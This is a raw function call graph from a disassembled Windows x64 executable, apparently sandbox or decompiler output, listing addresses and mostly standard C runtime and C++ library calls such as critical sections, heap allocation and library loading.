_set_errno_from_matherr 13 API calls 19550->19552 19564 7ff658e4376c EnterCriticalSection 19551->19564 19552->19554 18381 7ff658e2ae90 18383 7ff658e2aebb Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 18381->18383 18382 7ff658e2af3b 18403 7ff658e229c0 18382->18403 18383->18382 18386 7ff658e2aee9 char_traits 18383->18386 18396 7ff658e2af7d Concurrency::details::WorkQueue::IsStructuredEmpty codecvt _Func_class 18383->18396 18385 7ff658e2d840 _handle_error 8 API calls 18387 7ff658e2b1ec 18385->18387 18386->18385 18389 7ff658e2afaa char_traits 18391 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 18389->18391 18391->18386 18392 7ff658e2b0a4 char_traits 18395 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 18392->18395 18393 7ff658e2b099 18393->18392 18394 7ff658e2b186 18393->18394 18397 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 18394->18397 18395->18386 18396->18386 18396->18389 18396->18392 18396->18393 18400 7ff658e2b0bc Concurrency::details::WorkQueue::IsStructuredEmpty _Func_class 18396->18400 18406 7ff658e340dc 18396->18406 18423 7ff658e2a730 18396->18423 18437 7ff658e29880 18396->18437 18397->18386 18399 7ff658e2b136 18402 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 18399->18402 18400->18399 18427 7ff658e34eb4 18400->18427 18402->18386 18404 7ff658e340dc _Fgetc 30 API calls 18403->18404 18405 7ff658e229d8 18404->18405 18405->18386 18407 7ff658e340f8 18406->18407 18408 7ff658e34116 18406->18408 18409 7ff658e35e24 _set_errno_from_matherr 13 API calls 18407->18409 18440 7ff658e33c44 EnterCriticalSection 18408->18440 18411 7ff658e340fd _invalid_parameter_noinfo 18409->18411 18411->18396 18424 7ff658e2a7bf 18423->18424 18426 7ff658e2a75c Concurrency::details::WorkQueue::IsStructuredEmpty char_traits 18423->18426 18441 7ff658e22e30 18424->18441 18426->18396 18428 7ff658e34ecd 18427->18428 18429 7ff658e34eeb 18427->18429 18430 7ff658e35e24 _set_errno_from_matherr 13 API calls 18428->18430 18449 7ff658e33c44 EnterCriticalSection 18429->18449 18436 7ff658e34ed2 _invalid_parameter_noinfo 18430->18436 18436->18400 18450 7ff658e270e0 18437->18450 18439 7ff658e298a5 18439->18396 18442 7ff658e22e73 std::ios_base::failure::failure 18441->18442 18443 7ff658e28690 std::ios_base::failure::failure 15 API calls 18442->18443 18444 7ff658e22e87 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 18442->18444 18443->18444 18445 7ff658e286d0 allocator 21 API calls 18444->18445 18446 7ff658e22eeb Concurrency::details::WorkQueue::IsStructuredEmpty 18445->18446 18447 7ff658e22f84 std::ios_base::failure::failure 18446->18447 18448 7ff658e28ff0 allocator 17 API calls 18446->18448 18447->18426 18448->18447 18451 7ff658e270fe 18450->18451 18452 7ff658e27103 18450->18452 18454 7ff658e286b0 18451->18454 18452->18439 18457 7ff658e2be38 18454->18457 18462 7ff658e2bd2c 18457->18462 18460 7ff658e2e950 std::_Xinvalid_argument 2 API calls 18461 7ff658e2be5a 18460->18461 18463 7ff658e2e898 __std_exception_copy 13 API calls 18462->18463 18464 7ff658e2bd60 18463->18464 18464->18460 19187 7ff658e3cf84 19198 7ff658e34f54 EnterCriticalSection 19187->19198 14986 7ff658e2d974 15009 7ff658e2d218 14986->15009 14989 7ff658e2dac0 15254 7ff658e2dd08 IsProcessorFeaturePresent 14989->15254 14990 7ff658e2d990 __scrt_acquire_startup_lock 14992 7ff658e2daca 14990->14992 14997 7ff658e2d9ae __scrt_release_startup_lock 14990->14997 14993 7ff658e2dd08 __scrt_fastfail 7 API calls 14992->14993 14995 7ff658e2dad5 BuildCatchObjectHelperInternal 14993->14995 14994 7ff658e2d9d3 14996 7ff658e2da59 15015 7ff658e2de54 14996->15015 14997->14994 14997->14996 15243 7ff658e38bac 14997->15243 14999 7ff658e2da5e 15018 7ff658e397d4 14999->15018 15006 7ff658e2da81 15006->14995 15250 7ff658e2d3ac 15006->15250 15261 7ff658e2db48 15009->15261 15012 7ff658e2d247 __scrt_initialize_crt 15013 7ff658e2d243 15012->15013 15263 7ff658e2fa78 15012->15263 15013->14989 15013->14990 15290 7ff658e2f8c0 15015->15290 15292 7ff658e42dfc 15018->15292 15020 7ff658e2da66 15023 7ff658e210b0 15020->15023 15021 7ff658e397e3 15021->15020 15298 7ff658e431ac 15021->15298 15679 7ff658e26240 15023->15679 15025 7ff658e210f9 shared_ptr 15689 7ff658e23a20 15025->15689 15027 7ff658e21111 15693 7ff658e25c70 15027->15693 15029 7ff658e2112c shared_ptr 15030 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15029->15030 15031 7ff658e21144 15030->15031 15703 7ff658e25860 15031->15703 15033 7ff658e2115f shared_ptr 15034 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15033->15034 15035 7ff658e21177 15034->15035 15713 7ff658e26040 15035->15713 15037 7ff658e21192 shared_ptr 15038 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15037->15038 15039 7ff658e211aa 15038->15039 15723 7ff658e264b0 15039->15723 15041 7ff658e211c5 shared_ptr 15042 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15041->15042 15043 7ff658e211dd 15042->15043 15733 7ff658e26710 15043->15733 15045 7ff658e211f8 shared_ptr 15046 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15045->15046 15047 7ff658e21210 15046->15047 15743 7ff658e21db0 15047->15743 15049 7ff658e2121d type_info::_name_internal_method 15050 7ff658e21238 15049->15050 15051 7ff658e212a4 15049->15051 15053 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15050->15053 15760 7ff658e265f0 15051->15760 15055 7ff658e2124d 15053->15055 15054 7ff658e212bf shared_ptr 15059 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15054->15059 15056 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15055->15056 15057 7ff658e2125a 15056->15057 15058 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15057->15058 15061 7ff658e21267 15058->15061 15060 7ff658e212d7 15059->15060 15770 7ff658e26180 15060->15770 15063 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15061->15063 15065 7ff658e21274 15063->15065 15064 7ff658e212f2 shared_ptr 15068 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15064->15068 15066 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15065->15066 15067 7ff658e21281 15066->15067 15069 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15067->15069 15070 7ff658e2130a 15068->15070 15071 7ff658e2128e 15069->15071 15780 7ff658e225a0 15070->15780 15073 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15071->15073 15075 7ff658e2129b 15073->15075 15078 7ff658e2d840 _handle_error 8 API calls 15075->15078 15080 7ff658e2193e 15078->15080 15248 7ff658e2de9c GetModuleHandleW 15080->15248 15081 7ff658e2135b 15795 7ff658e24ec0 15081->15795 15083 7ff658e21368 15084 7ff658e22690 32 API calls 15083->15084 15085 7ff658e21384 15084->15085 15086 7ff658e224e0 32 API calls 15085->15086 15087 7ff658e2139c 15086->15087 15088 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15087->15088 15089 7ff658e213a9 15088->15089 15798 7ff658e239a0 15089->15798 15091 7ff658e213c8 15802 7ff658e21ea0 15091->15802 15094 7ff658e21488 15813 7ff658e25a10 15094->15813 15095 7ff658e213db 15097 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15095->15097 15098 7ff658e213f0 15097->15098 15099 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15098->15099 15100 7ff658e213fd 15099->15100 15102 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15100->15102 15101 7ff658e214a3 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 15823 7ff658e22270 15101->15823 15103 7ff658e2140a 15102->15103 15104 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15103->15104 15106 7ff658e21417 15104->15106 15108 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15106->15108 15110 7ff658e21424 15108->15110 15109 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15111 7ff658e214e9 15109->15111 15112 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15110->15112 15113 7ff658e21ea0 35 API calls 15111->15113 15114 7ff658e21431 15112->15114 15115 7ff658e214f1 15113->15115 15116 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15114->15116 15117 7ff658e215a9 15115->15117 15118 7ff658e214fc 15115->15118 15120 7ff658e2143e 15116->15120 15121 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15117->15121 15119 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15118->15119 15122 7ff658e21511 15119->15122 15123 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15120->15123 15124 7ff658e215d5 15121->15124 15125 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15122->15125 15126 7ff658e2144b 15123->15126 15127 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15124->15127 15128 7ff658e2151e 15125->15128 15129 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15126->15129 15130 7ff658e215ec 15127->15130 15131 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15128->15131 15132 7ff658e21458 15129->15132 15840 7ff658e21f30 15130->15840 15134 7ff658e2152b 15131->15134 15135 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15132->15135 15137 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15134->15137 15138 7ff658e21465 15135->15138 15141 7ff658e21538 15137->15141 15142 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15138->15142 15140 7ff658e2161b shared_ptr 15147 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15140->15147 15143 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15141->15143 15144 7ff658e21472 15142->15144 15146 7ff658e21545 15143->15146 15145 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15144->15145 15145->15075 15148 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15146->15148 15149 7ff658e21633 15147->15149 15150 7ff658e21552 15148->15150 15151 7ff658e22690 32 API calls 15149->15151 15152 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15150->15152 15153 7ff658e2164f 15151->15153 15154 7ff658e2155f 15152->15154 15155 7ff658e224e0 32 API calls 15153->15155 15156 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15154->15156 15157 7ff658e21667 15155->15157 15158 7ff658e2156c 15156->15158 15889 7ff658e22540 15157->15889 15159 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15158->15159 15161 7ff658e21579 15159->15161 15163 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15161->15163 15162 7ff658e2167e 15164 7ff658e224e0 32 API calls 15162->15164 15165 7ff658e21586 15163->15165 15166 7ff658e21696 15164->15166 15167 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15165->15167 15168 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15166->15168 15169 7ff658e21593 15167->15169 15170 7ff658e216a3 15168->15170 15171 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15169->15171 15172 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15170->15172 15171->15075 15173 7ff658e216b0 15172->15173 15174 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15173->15174 15175 7ff658e216bd 15174->15175 15892 7ff658e25e80 15175->15892 15177 7ff658e216d8 shared_ptr 15178 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15177->15178 15179 7ff658e216f0 15178->15179 15180 7ff658e22690 32 API calls 15179->15180 15181 7ff658e2170c 15180->15181 15182 7ff658e224e0 32 API calls 15181->15182 15183 7ff658e21724 15182->15183 15184 7ff658e22540 32 API calls 15183->15184 15185 7ff658e2173b 15184->15185 15186 7ff658e224e0 32 API calls 15185->15186 15187 7ff658e21753 15186->15187 15188 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15187->15188 15189 7ff658e21760 15188->15189 15190 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15189->15190 15191 7ff658e2176d 15190->15191 15192 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15191->15192 15193 7ff658e2177a 15192->15193 15194 7ff658e22690 32 API calls 15193->15194 15195 7ff658e21796 15194->15195 15196 7ff658e224e0 32 API calls 15195->15196 15197 7ff658e217ae 15196->15197 15198 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15197->15198 15199 7ff658e217bb 15198->15199 15200 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15199->15200 15201 7ff658e217e6 15200->15201 15202 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15201->15202 15203 7ff658e21800 15202->15203 15902 7ff658e21ab0 15203->15902 15206 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15207 7ff658e2183d 15206->15207 15949 7ff658e22160 15207->15949 15210 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15211 7ff658e2185a 15210->15211 15212 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15211->15212 15213 7ff658e21867 15212->15213 15214 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15213->15214 15215 7ff658e21874 15214->15215 15216 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15215->15216 15217 7ff658e21881 15216->15217 15218 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15217->15218 15219 7ff658e2188e 15218->15219 15220 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15219->15220 15221 7ff658e2189b 15220->15221 15222 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15221->15222 15223 7ff658e218a8 15222->15223 15224 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15223->15224 15225 7ff658e218b5 15224->15225 15226 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15225->15226 15227 7ff658e218c2 15226->15227 15228 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15227->15228 15229 7ff658e218cf 15228->15229 15230 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15229->15230 15231 7ff658e218dc 15230->15231 15232 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15231->15232 15233 7ff658e218e9 15232->15233 15234 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15233->15234 15235 7ff658e218f6 15234->15235 15236 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15235->15236 15237 7ff658e21903 15236->15237 15238 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15237->15238 15239 7ff658e21910 15238->15239 15240 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15239->15240 15241 7ff658e2191d 15240->15241 15242 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15241->15242 15242->15075 15244 7ff658e38bd0 15243->15244 15245 7ff658e38be2 15243->15245 15244->14996 16559 7ff658e3b394 15245->16559 15249 7ff658e2dead 15248->15249 15249->15006 15252 7ff658e2d3bd 15250->15252 15251 7ff658e2d3cd 15251->14994 15252->15251 15253 7ff658e2fa78 __scrt_initialize_crt 7 API calls 15252->15253 15253->15251 15255 7ff658e2dd2d __scrt_fastfail 15254->15255 15256 7ff658e2dd4c RtlCaptureContext RtlLookupFunctionEntry 15255->15256 15257 7ff658e2ddb1 __scrt_fastfail 15256->15257 15258 7ff658e2dd75 RtlVirtualUnwind 15256->15258 15259 7ff658e2dde3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15257->15259 15258->15257 15260 7ff658e2de35 __scrt_fastfail 15259->15260 15260->14992 15262 7ff658e2d23a __scrt_dllmain_crt_thread_attach 15261->15262 15262->15012 15262->15013 15264 7ff658e2fa8a 15263->15264 15265 7ff658e2fa80 15263->15265 15264->15013 15269 7ff658e2fe5c 15265->15269 15270 7ff658e2fa85 15269->15270 15271 7ff658e2fe6b 15269->15271 15273 7ff658e32f3c 15270->15273 15277 7ff658e33190 15271->15277 15274 7ff658e32f67 15273->15274 15275 7ff658e32f4a DeleteCriticalSection 15274->15275 15276 7ff658e32f6b 15274->15276 15275->15274 15276->15264 15281 7ff658e32ffc 15277->15281 15282 7ff658e3303f try_get_function 15281->15282 15288 7ff658e33114 TlsFree 15281->15288 15283 7ff658e3306c LoadLibraryExW 15282->15283 15284 7ff658e33103 GetProcAddress 15282->15284 15282->15288 15289 7ff658e330af LoadLibraryExW 15282->15289 15285 7ff658e3308d GetLastError 15283->15285 15286 7ff658e330e3 15283->15286 15284->15288 15285->15282 15286->15284 15287 7ff658e330fa FreeLibrary 15286->15287 15287->15284 15289->15282 15289->15286 15291 7ff658e2de6b GetStartupInfoW 15290->15291 15291->14999 15293 7ff658e42e09 15292->15293 15297 7ff658e42e4e 15292->15297 15302 7ff658e3bff8 15293->15302 15297->15021 15299 7ff658e43134 15298->15299 15300 7ff658e35354 TranslateName 30 API calls 15299->15300 15301 7ff658e43158 15300->15301 15301->15021 15303 7ff658e3c009 15302->15303 15304 7ff658e3c00e 15302->15304 15345 7ff658e3c6b4 15303->15345 15310 7ff658e3c016 15304->15310 15349 7ff658e3c6fc 15304->15349 15315 7ff658e3c090 15310->15315 15371 7ff658e383b8 15310->15371 15311 7ff658e3c040 15313 7ff658e3c05e 15311->15313 15314 7ff658e3c04e 15311->15314 15317 7ff658e3c6fc _Getctype 6 API calls 15313->15317 15316 7ff658e3c6fc _Getctype 6 API calls 15314->15316 15327 7ff658e42b80 15315->15327 15319 7ff658e3c055 15316->15319 15318 7ff658e3c066 15317->15318 15320 7ff658e3c07c 15318->15320 15321 7ff658e3c06a 15318->15321 15361 7ff658e3c1cc 15319->15361 15366 7ff658e3bcd4 15320->15366 15324 7ff658e3c6fc _Getctype 6 API calls 15321->15324 15324->15319 15520 7ff658e42d44 15327->15520 15329 7ff658e42ba9 15535 7ff658e4288c 15329->15535 15332 7ff658e42bc3 15332->15297 15334 7ff658e42c6f 15336 7ff658e3c1cc __free_lconv_mon 13 API calls 15334->15336 15336->15332 15339 7ff658e42c6a 15340 7ff658e35e24 _set_errno_from_matherr 13 API calls 15339->15340 15340->15334 15341 7ff658e42ccc 15341->15334 15560 7ff658e426d0 15341->15560 15342 7ff658e42c8f 15342->15341 15343 7ff658e3c1cc __free_lconv_mon 13 API calls 15342->15343 15343->15341 15380 7ff658e3c328 15345->15380 15350 7ff658e3c328 try_get_function 5 API calls 15349->15350 15351 7ff658e3c72a 15350->15351 15352 7ff658e3c73c TlsSetValue 15351->15352 15353 7ff658e3c02d 15351->15353 15352->15353 15353->15310 15354 7ff658e3c20c 15353->15354 15360 7ff658e3c21d _Getctype 15354->15360 15355 7ff658e3c26e 15392 7ff658e35e24 15355->15392 15356 7ff658e3c252 HeapAlloc 15358 7ff658e3c26c 15356->15358 15356->15360 15358->15311 15360->15355 15360->15356 15389 7ff658e38724 15360->15389 15362 7ff658e3c203 15361->15362 15363 7ff658e3c1d1 HeapFree 15361->15363 15362->15310 15363->15362 15364 7ff658e3c1ec 15363->15364 15365 7ff658e35e24 _set_errno_from_matherr 12 API calls 15364->15365 15365->15362 15424 7ff658e3bbac 15366->15424 15438 7ff658e41738 15371->15438 15381 7ff658e3c389 TlsGetValue 15380->15381 15387 7ff658e3c384 try_get_function 15380->15387 15382 7ff658e3c46c 15382->15381 15385 7ff658e3c47a GetProcAddress 15382->15385 15383 7ff658e3c3b8 LoadLibraryExW 15384 7ff658e3c3d9 GetLastError 15383->15384 15383->15387 15384->15387 15385->15381 15386 7ff658e3c451 FreeLibrary 15386->15387 15387->15381 15387->15382 15387->15383 15387->15386 15388 7ff658e3c413 LoadLibraryExW 15387->15388 15388->15387 15395 7ff658e38754 15389->15395 15401 7ff658e3c0a0 GetLastError 15392->15401 15394 7ff658e35e2d 15394->15358 15400 7ff658e34f54 EnterCriticalSection 15395->15400 15402 7ff658e3c0c2 15401->15402 15405 7ff658e3c0c7 15401->15405 15403 7ff658e3c6b4 _Getctype 6 API calls 15402->15403 15403->15405 15404 7ff658e3c6fc _Getctype 6 API calls 15406 7ff658e3c0ea 15404->15406 15405->15404 15407 7ff658e3c0cf SetLastError 15405->15407 15406->15407 15408 7ff658e3c20c _Getctype 11 API calls 15406->15408 15407->15394 15410 7ff658e3c0fd 15408->15410 15411 7ff658e3c11b 15410->15411 15412 7ff658e3c10b 15410->15412 15414 7ff658e3c6fc _Getctype 6 API calls 15411->15414 15413 7ff658e3c6fc _Getctype 6 API calls 15412->15413 15415 7ff658e3c112 15413->15415 15416 7ff658e3c123 15414->15416 15419 7ff658e3c1cc __free_lconv_mon 11 API calls 15415->15419 15417 7ff658e3c139 15416->15417 15418 7ff658e3c127 15416->15418 15421 7ff658e3bcd4 _Getctype 11 API calls 15417->15421 15420 7ff658e3c6fc _Getctype 6 API calls 15418->15420 15419->15407 15420->15415 15422 7ff658e3c141 15421->15422 15423 7ff658e3c1cc __free_lconv_mon 11 API calls 15422->15423 15423->15407 15436 7ff658e34f54 EnterCriticalSection 15424->15436 15470 7ff658e416f0 15438->15470 15475 7ff658e34f54 EnterCriticalSection 15470->15475 15521 7ff658e42d67 15520->15521 15522 7ff658e42d71 15521->15522 15571 7ff658e34f54 EnterCriticalSection 15521->15571 15524 7ff658e42de3 15522->15524 15527 7ff658e383b8 BuildCatchObjectHelperInternal 30 API calls 15522->15527 15524->15329 15528 7ff658e42dfb 15527->15528 15531 7ff658e3bff8 30 API calls 15528->15531 15534 7ff658e42e4e 15528->15534 15532 7ff658e42e38 15531->15532 15533 7ff658e42b80 40 API calls 15532->15533 15533->15534 15534->15329 15572 7ff658e35354 15535->15572 15538 7ff658e428ac GetOEMCP 15540 7ff658e428d3 15538->15540 15539 7ff658e428be 15539->15540 15541 7ff658e428c3 GetACP 15539->15541 15540->15332 15542 7ff658e3f734 15540->15542 15541->15540 15543 7ff658e3f77f 15542->15543 15547 7ff658e3f743 _Getctype 15542->15547 15545 7ff658e35e24 _set_errno_from_matherr 13 API calls 15543->15545 15544 7ff658e3f766 HeapAlloc 15546 7ff658e3f77d 15544->15546 15544->15547 15545->15546 15546->15334 15549 7ff658e42e78 15546->15549 15547->15543 15547->15544 15548 7ff658e38724 std::_Facet_Register 2 API calls 15547->15548 15548->15547 15550 7ff658e4288c 32 API calls 15549->15550 15551 7ff658e42ea3 15550->15551 15553 7ff658e42ee0 IsValidCodePage 15551->15553 15558 7ff658e42f23 __scrt_fastfail 15551->15558 15552 7ff658e2d840 _handle_error 8 API calls 15554 7ff658e42c63 15552->15554 15555 7ff658e42ef1 15553->15555 15553->15558 15554->15339 15554->15342 15556 7ff658e42f28 GetCPInfo 15555->15556 15559 7ff658e42efa __scrt_fastfail 15555->15559 15556->15558 15556->15559 15558->15552 15604 7ff658e4299c 15559->15604 15678 7ff658e34f54 EnterCriticalSection 15560->15678 15573 7ff658e35378 15572->15573 15574 7ff658e35373 15572->15574 15573->15574 15575 7ff658e3bf24 _Getctype 30 API calls 15573->15575 15574->15538 15574->15539 15576 7ff658e35393 15575->15576 15580 7ff658e3ffa4 15576->15580 15581 7ff658e3ffb9 15580->15581 15583 7ff658e353b6 15580->15583 15581->15583 15588 7ff658e44e68 15581->15588 15584 7ff658e3ffd8 15583->15584 15585 7ff658e3ffed 15584->15585 15586 7ff658e40000 15584->15586 15585->15586 15601 7ff658e42e5c 15585->15601 15586->15574 15589 7ff658e3bf24 _Getctype 30 API calls 15588->15589 15590 7ff658e44e77 15589->15590 15591 7ff658e44ec0 15590->15591 15600 7ff658e34f54 EnterCriticalSection 15590->15600 15591->15583 15602 7ff658e3bf24 _Getctype 30 API calls 15601->15602 15603 7ff658e42e65 15602->15603 15605 7ff658e429d9 GetCPInfo 15604->15605 15614 7ff658e42ad1 15604->15614 15610 7ff658e429ec 15605->15610 15605->15614 15606 7ff658e2d840 _handle_error 8 API calls 15607 7ff658e42b6a 15606->15607 15607->15558 15615 7ff658e40458 15610->15615 15614->15606 15616 7ff658e35354 TranslateName 30 API calls 15615->15616 15617 7ff658e4049a 15616->15617 15635 7ff658e419f4 15617->15635 15636 7ff658e419fc MultiByteToWideChar 15635->15636 15680 7ff658e26321 15679->15680 15681 7ff658e26360 15679->15681 15970 7ff658e2d5b4 EnterCriticalSection 15680->15970 15682 7ff658e2d840 _handle_error 8 API calls 15681->15682 15684 7ff658e26374 15682->15684 15684->15025 15690 7ff658e23a40 std::ios_base::failure::failure 15689->15690 15978 7ff658e28940 15690->15978 15692 7ff658e23a7b Concurrency::details::WorkQueue::IsStructuredEmpty 15692->15027 15694 7ff658e25d51 15693->15694 15695 7ff658e25d90 15693->15695 15697 7ff658e2d5b4 5 API calls 15694->15697 15696 7ff658e2d840 _handle_error 8 API calls 15695->15696 15698 7ff658e25da4 15696->15698 15699 7ff658e25d5d 15697->15699 15698->15029 15699->15695 16082 7ff658e2d414 15699->16082 15704 7ff658e25941 15703->15704 15705 7ff658e25980 15703->15705 15707 7ff658e2d5b4 5 API calls 15704->15707 15706 7ff658e2d840 _handle_error 8 API calls 15705->15706 15708 7ff658e25994 15706->15708 15709 7ff658e2594d 15707->15709 15708->15033 15709->15705 15710 7ff658e2d414 16 API calls 15709->15710 15711 7ff658e25973 15710->15711 15712 7ff658e2d554 4 API calls 15711->15712 15712->15705 15714 7ff658e26121 15713->15714 15715 7ff658e26160 15713->15715 15716 7ff658e2d5b4 5 API calls 15714->15716 15717 7ff658e2d840 _handle_error 8 API calls 15715->15717 15719 7ff658e2612d 15716->15719 15718 7ff658e26174 15717->15718 15718->15037 15719->15715 15720 7ff658e2d414 16 API calls 15719->15720 15721 7ff658e26153 15720->15721 15722 7ff658e2d554 4 API calls 15721->15722 15722->15715 15724 7ff658e26591 15723->15724 15725 7ff658e265d0 15723->15725 15726 7ff658e2d5b4 5 API calls 15724->15726 15727 7ff658e2d840 _handle_error 8 API calls 15725->15727 15729 7ff658e2659d 15726->15729 15728 7ff658e265e4 15727->15728 15728->15041 15729->15725 15730 7ff658e2d414 16 API calls 15729->15730 15731 7ff658e265c3 15730->15731 15732 7ff658e2d554 4 API calls 15731->15732 15732->15725 15734 7ff658e267f1 15733->15734 15735 7ff658e26830 15733->15735 15736 7ff658e2d5b4 5 API calls 15734->15736 15737 7ff658e2d840 _handle_error 8 API calls 15735->15737 15739 7ff658e267fd 15736->15739 15738 7ff658e26844 15737->15738 15738->15045 15739->15735 15740 7ff658e2d414 16 API calls 15739->15740 15741 7ff658e26823 15740->15741 15742 7ff658e2d554 4 API calls 15741->15742 15742->15735 15744 7ff658e23a20 